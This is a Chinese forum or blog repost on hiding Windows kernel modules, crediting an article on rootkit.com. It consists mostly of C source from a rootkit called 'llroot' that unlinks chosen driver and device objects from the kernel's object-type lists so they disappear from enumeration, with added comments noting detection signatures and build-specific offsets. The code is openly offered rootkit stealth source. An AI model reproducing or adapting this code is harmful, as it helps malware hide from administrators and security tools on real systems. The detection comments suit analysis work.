隐藏内核模块的方法

<a target=_blank href="http://bbs.ednchina.com/BLOG_ARTICLE_99800.HTM">原文地址http://bbs.ednchina.com/BLOG_ARTICLE_99800.HTM</a>
remove module from device objects

在 rootkit.com 上一个 russian hacker 发的文章中提到了这两种方法，和他交流了一下，在 llroot 中实现了，代码贴出来灌水：

/******************************************************************************
**
** The following routines hide a driver by unlinking its module from the
** driver-object type list and the device-object type list
**
*******************************************************************************/
/*
 * Unlink selected driver objects from the driver object type's object list.
 *
 * Walks IoDriverObjectType->ObjectListHead as a circular LIST_ENTRY ring,
 * resolves each link to its DRIVER_OBJECT, queries the object's name and, when
 * the (not shown) WalkHideDriverList() approves it, splices the link out of the
 * ring.  Nothing else about the driver object is touched: it stays allocated
 * and its own Flink/Blink remain intact, so as far as this code goes only
 * enumerations that walk this particular list are affected.
 *
 * Detection / review notes:
 *  - This is direct kernel object manipulation on an undocumented layout: the
 *    hard-coded 0x28 offset and the DWORD pointer casts below tie the code to
 *    one 32-bit OS build.
 *  - The fixed "llroot-->" DbgPrint strings are a static signature of the
 *    binary.
 *  - NOTE(review): an inventory taken from an independent source can be
 *    cross-checked against this list to surface the unlinked driver; which
 *    enumerations still observe it depends on the OS build — confirm.
 *  - No synchronization with the object manager is visible around the walk or
 *    the unlink.
 */
void RemoveModuleFromDriverObjects(void)
{
 POBJECT_TYPE DriverType=*IoDriverObjectType; /* its ObjectListHead is the ring walked below */
 PLIST_ENTRY e_prev,e_next,entry0,entry1;
 PDRIVER_OBJECT obj;
 PUNICODE_STRING punistrDriverName;
 PANSI_STRING pstrDriverName;
 NTSTATUS ntStatus;
 ULONG d_size; /* filled by ObQueryNameString, never read afterwards */
 
 
 /* start at the first link and remember it as the loop sentinel */
 entry0=DriverType->ObjectListHead.Flink;
 entry1=entry0;
 /* one paged allocation: UNICODE_STRING header followed by 1024 WCHARs of buffer */
 punistrDriverName=(PUNICODE_STRING) ExAllocatePool(PagedPool, sizeof(UNICODE_STRING)+(sizeof(WCHAR)*1024));
 if (punistrDriverName == NULL)
 {
  DbgPrint("llroot-->punistrDriverName allocate failed\n");
  return;
 }
 punistrDriverName->Length=0;
 /* advertised as 1022 bytes although 2048 bytes of buffer were allocated */
 punistrDriverName->MaximumLength = 1022;
 /* buffer starts right after the header; the DWORD cast assumes a 32-bit pointer */
 punistrDriverName->Buffer = (PWSTR)((DWORD)punistrDriverName + sizeof(UNICODE_STRING));
 
 /* same layout for the ANSI copy: ANSI_STRING header followed by 1024 CHARs */
 pstrDriverName=(PANSI_STRING)ExAllocatePool(PagedPool,sizeof(ANSI_STRING)+sizeof(CHAR)*1024);
 if(pstrDriverName== NULL)
 {
  ExFreePool(punistrDriverName);
  return;
 }
 pstrDriverName->Length=0;
 pstrDriverName->MaximumLength=1022;
 pstrDriverName->Buffer=(PCHAR)((DWORD)pstrDriverName + sizeof(ANSI_STRING));
 
 do
 {
  /* hard-coded offset from the type-list link to the object body; presumably
   * lands inside the object header and is specific to one OS build — verify */
  obj=(PDRIVER_OBJECT)((PBYTE)entry1+0x28);
  /* pre-fill with the character '0' (0x30), not NUL */
  RtlFillMemory(punistrDriverName->Buffer,1022,'0');
  punistrDriverName->Length=0;
  punistrDriverName->MaximumLength=1022;
  /* the UNICODE_STRING doubles as OBJECT_NAME_INFORMATION, whose first member
   * is a UNICODE_STRING; MaximumLength is passed as the total buffer size */
  ntStatus = ObQueryNameString(obj, 
           (POBJECT_NAME_INFORMATION) punistrDriverName, 
        punistrDriverName->MaximumLength, 
        &d_size);
  if(!NT_SUCCESS(ntStatus))
   goto next; /* unnamed or unreadable object: leave it linked */
  DbgPrint("llroot-->Module Name:%S\n",punistrDriverName->Buffer); /* %S prints the wide buffer */
      
  /* FALSE: convert into the caller-owned ANSI buffer rather than allocating */
  if(RtlUnicodeStringToAnsiString(pstrDriverName,punistrDriverName,FALSE)==STATUS_SUCCESS)
  {
    /* GetBaseModuleName() is not shown; presumably trims the ANSI name to its
     * module base name and returns the new length — confirm against its definition */
    pstrDriverName->Length=GetBaseModuleName(pstrDriverName->Buffer,pstrDriverName->Length);
    DbgPrint("llroot-->pstrDivername:%s\t\t length:%d\n",pstrDriverName->Buffer,pstrDriverName->Length);
       
    /* WalkHideDriverList() is not shown; presumably matches the name against
     * the configured hide list.  Length-1 drops one character from the
     * computed length — intent not evident from here */
    if(WalkHideDriverList(pstrDriverName->Buffer,pstrDriverName->Length-1))
    {
      DbgPrint("llroot-->Now we hide driver:%s\n",pstrDriverName->Buffer);
      /* unlink: re-point the neighbours around entry1; entry1's own links are
       * left untouched so the walk below can still continue through it */
      e_prev = entry1->Blink;
           e_next = entry1->Flink;
           e_prev->Flink = e_next;
           e_next->Blink = e_prev;
        }
    }
   next:
   entry1 = entry1->Flink;
 }while(entry1!=entry0); /* stop once the ring comes back to the first link */
 ExFreePool(punistrDriverName);
 ExFreePool(pstrDriverName);
}

 

/*
 * Unlink device objects from the device object type's object list.
 *
 * pDriverObj : when non-NULL, every DEVICE_OBJECT whose DriverObject equals it
 *              is unlinked.
 * Independently of that, any device approved by the (not shown)
 * WalkHideDeviceList() is unlinked as well.  As in
 * RemoveModuleFromDriverObjects() only the neighbours' ring links change; the
 * device object itself is not modified or freed.
 *
 * Detection / review notes: same hard-coded 0x28 link-to-body offset and
 * 32-bit DWORD casts as RemoveModuleFromDriverObjects(); the "llroot-->"
 * debug strings are a static signature of the binary; no synchronization with
 * the object manager is visible around the walk or the unlink.
 */
void RemoveModuleFromDeviceObjects(PDRIVER_OBJECT pDriverObj)
{
 POBJECT_TYPE DeviceType=*IoDeviceObjectType; /* its ObjectListHead is the ring walked below */
 PLIST_ENTRY e_prev,e_next,entry0,entry1;
 PDEVICE_OBJECT obj;
 /* start at the first link and remember it as the loop sentinel */
 entry0=DeviceType->ObjectListHead.Flink;
 entry1=entry0;
 
 do
 {
  /* hard-coded, build-specific offset from the type-list link to the object body */
  obj=(PDEVICE_OBJECT)((PBYTE)entry1+0x28);
  /* first path: the device belongs to the driver passed in */
  if((pDriverObj!=NULL)&&(obj->DriverObject==pDriverObj))
  {
   /* (DWORD)obj truncates the pointer on a 64-bit build; %.8x assumes 32 bits */
   DbgPrint("llroot-->Now we hide device:0x%.8x\n",(DWORD)obj);
   e_prev = entry1->Blink;
      e_next = entry1->Flink;
      e_prev->Flink = e_next;
      e_next->Blink = e_prev;
      goto next; /* already unlinked; skip the second check */
    }
    /* second path: WalkHideDeviceList() is not shown; presumably consults the
     * configured device hide list */
    if(WalkHideDeviceList(obj))
    {
     DbgPrint("llroot-->Now we hide device:0x%.8x\n",(DWORD)obj);
     e_prev = entry1->Blink;
      e_next = entry1->Flink;
      e_prev->Flink = e_next;
      e_next->Blink = e_prev;
    }
    next:
       entry1 = entry1->Flink; /* entry1's own links are intact, so the walk continues */
  }while(entry1!=entry0);
}
